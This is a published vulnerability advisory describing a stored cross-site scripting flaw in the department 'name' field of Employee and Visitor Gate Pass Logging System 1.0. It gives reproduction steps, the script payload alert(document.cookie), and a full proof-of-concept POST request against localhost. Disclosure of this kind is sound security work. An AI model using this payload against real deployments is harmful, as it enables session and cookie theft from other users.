Employee And Visitor Gate Pass Logging System 1.0 Cross Site Scripting

Credit: Ilhami Selmet
Risk: Low
Local: No
Remote: Yes

# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) # Date: 10.11.2021 # Exploit Author: ─░lhami Selamet # Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code # Version: v1.0 # Tested on: Kali Linux + XAMPP v8.0.12 Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department Step 1 - Click on the 'Create New' button for adding a new department. Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script> Step 3 - Save the department. The stored XSS triggers for all users that navigate to the 'Department List' page. PoC POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 Content-Length: 555 Origin: http://localhost Connection: close Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="id" -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="name" <script>alert(document.cookie);</script> -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="description" desc -----------------------------407760789114464123714007564888 Content-Disposition: form-data; name="status" 1 -----------------------------407760789114464123714007564888--

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com


Back to Top